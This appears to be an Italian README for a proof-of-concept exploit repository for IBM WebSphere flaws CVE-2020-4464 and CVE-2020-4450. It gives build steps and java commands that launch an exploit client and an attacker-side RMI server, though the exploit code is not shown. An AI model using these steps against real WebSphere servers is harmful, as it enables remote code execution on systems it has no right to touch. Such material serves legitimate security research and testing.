
CVE-2020-4464 / CVE-2020-4450
Questo si basa sugli eccellenti post del blog di ZDI (report originale di @_tint0):
... e sul lavoro di alcuni abili hacker cinesi (non sono riuscito a determinare la vera fonte del codice, sentiti libero di aprire una Issue se pensi di meritare il credito):
Le mie aggiunte (non molto, in realtà):
Il codice di FoxGlove viene incluso come sottomodulo; puoi usare il file di richiesta WebSphere per innescare CVE-2020-4464.
Dovresti copiare le directory plugins e runtimes da WebSphere nella directory lib, quindi eseguire per compilare!
antPer eseguire (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer